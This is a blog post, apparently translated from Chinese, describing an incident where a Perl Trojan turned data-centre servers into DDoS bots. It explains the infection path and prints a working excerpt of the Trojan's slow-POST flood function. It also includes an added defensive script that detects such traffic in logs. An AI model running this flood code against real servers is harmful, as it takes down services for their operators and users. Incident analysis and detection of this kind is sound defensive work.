One O & M, a Linux Trojan

Source: Internet
Author: User
Tags: perl script

Over the past month, several servers in the data center were infected with Trojans and customer websites came under DDoS attack. The company's O&M (operations and maintenance) staff were in a frantic state; even my own project was halted by the department head so that I could be pulled in to support O&M. This was the first time I had seen a Trojan on Linux, and it is worth writing down.
 

Log analysis showed that the attacker obtained the customer's backend (admin) password by some means, then uploaded falabiya.cgi inside a compressed archive and executed it through a control panel vulnerability. Running it produced the file .X11-unix (actually the base64_decode'd payload embedded in falabiya); .X11-unix is the actual backdoor program.
 
Both Felix021 and senior mango of Xin'an expressed interest in this case, so I analyzed it with each of them separately. It is a well-written Perl script. Its purpose is to turn our server into a zombie: it listens on a port for instructions, sends traffic to a specified address, and thereby carries out DDoS attacks. The code has a built-in table of User-Agent strings covering almost every browser, and one is picked at random for each request to disguise the traffic as normal access. Several DDoS methods are implemented, such as genGarbage, TCP flood, UDP flood and slow GET/POST. The sendSlowPostRequest method is especially nasty: it announces the body length and then releases the body a tiny piece at a time, so the other side has to hold its resources open and wait for you to finish sending. In just a few hundred lines of code, the error handling for all kinds of failures is very careful; it must be the work of a seasoned author. There are some unidentifiable characters in the comments whose encoding we could not determine, so we could not infer which country the author came from.
 
# Excerpt from the Trojan: relies on `use Socket;` and on the script's global
# $ua, the randomly chosen browser User-Agent string mentioned above.
sub sendSlowPostRequest {
    my $host       = $_[0];
    my $port       = $_[1];
    my $path       = $_[2];
    my $contentLen = $_[3];
    my $chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+|\=-~'2017 ";

    print "start\n";

    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    $iaddr = inet_aton($host);
    $paddr = sockaddr_in($port, $iaddr);
    connect(SOCK, $paddr);

    # send header: the Content-Length announces the full body up front
    send(SOCK, "POST " . $path . " HTTP/1.1\r\n", 0);
    send(SOCK, "Host: $host\r\n", 0);
    send(SOCK, "User-Agent: $ua\r\n", 0);
    send(SOCK, "Content-type: application/x-www-form-urlencoded\r\n", 0);
    send(SOCK, "Content-length: $contentLen\r\n", 0);
    send(SOCK, "\r\n", 0);

    # send body: one random byte every 3 seconds, so the server keeps the
    # connection (and its resources) open waiting for the rest of the body
    for my $i (1 .. $contentLen) {
        my $symbol = substr $chars, int rand length($chars), 1;
        print "$symbol";
        send(SOCK, $symbol, 0);
        sleep 3;
    }
    send(SOCK, "\r\n", 0);
    close(SOCK);
    print "end\n";
}
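The defender-side counterpart to the method above, as an added example that is not part of the original post or of the Trojan's code: given per-connection samples of how many body bytes have arrived since the headers were read, flag connections whose announced body is trickling in far below a normal rate, and alert on sources holding several such connections at once. The thresholds, the BodySample record and the sample data are all assumptions constructed for this example.

```python
from collections import defaultdict
from dataclasses import dataclass

# Thresholds are assumed values for this example; tune them to real traffic.
MIN_OBSERVATION_SECONDS = 10.0   # do not judge connections seen for < 10 s
MIN_BODY_BYTES_PER_SECOND = 1.0  # below this the body is trickling
SLOW_CONNS_PER_SOURCE_ALERT = 3  # this many slow connections from one IP

@dataclass
class BodySample:
    conn_id: str
    src_ip: str
    t: float             # seconds since the request headers were received
    body_bytes: int      # cumulative body bytes received so far
    content_length: int  # value announced in the Content-Length header

def slow_post_connections(samples):
    """Return {conn_id: (src_ip, bytes_per_second)} for connections whose
    announced body is arriving slower than MIN_BODY_BYTES_PER_SECOND."""
    by_conn = defaultdict(list)
    for s in samples:
        by_conn[s.conn_id].append(s)
    slow = {}
    for conn_id, conn_samples in by_conn.items():
        last = max(conn_samples, key=lambda s: s.t)  # latest progress sample
        if last.t < MIN_OBSERVATION_SECONDS or last.body_bytes >= last.content_length:
            continue  # too early to judge, or the body already arrived in full
        rate = last.body_bytes / last.t
        if rate < MIN_BODY_BYTES_PER_SECOND:
            slow[conn_id] = (last.src_ip, rate)
    return slow

def sources_to_alert(slow):
    """Source IPs holding SLOW_CONNS_PER_SOURCE_ALERT or more slow connections."""
    count = defaultdict(int)
    for src_ip, _ in slow.values():
        count[src_ip] += 1
    return sorted(ip for ip, n in count.items() if n >= SLOW_CONNS_PER_SOURCE_ALERT)

# Constructed sample data: three trickling connections from one source
# (about 1 byte per 3 s against a 5000-byte Content-Length), one normal upload.
SAMPLES = [
    BodySample("c1", "198.51.100.7", 0.0, 0, 5000),
    BodySample("c1", "198.51.100.7", 30.0, 10, 5000),
    BodySample("c2", "198.51.100.7", 30.0, 10, 5000),
    BodySample("c3", "198.51.100.7", 30.0, 10, 5000),
    BodySample("c4", "203.0.113.5", 0.4, 4096, 4096),  # normal: body complete
    BodySample("c5", "203.0.113.9", 2.0, 1, 5000),     # too new to judge
]
```

In practice the same two checks are what a reverse proxy's body-read timeout and per-client connection limit enforce, so this logic is mainly useful for spotting the pattern in access or connection logs after the fact.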
Afterwards we removed all the Trojans, restricted script execution, and configured the firewall to block abnormal outbound traffic. As for the DDoS attacks against us, we also configured a firewall to handle them; the number of devices involved was several million, which was quite powerful. Because many of the attacks came from China, the boss has always "admired" mainland hackers and asked me to introduce some to him.. In fact I know what the so-called "hackers" in China are like, so I ended up pulling in LC, who went to the Chinese Academy of Sciences after graduating from Wu Da Xin'an...... Later the boss went to Beijing to discuss cooperation with lumeng. It is said their company is about to go public.

The code must be pushed here.
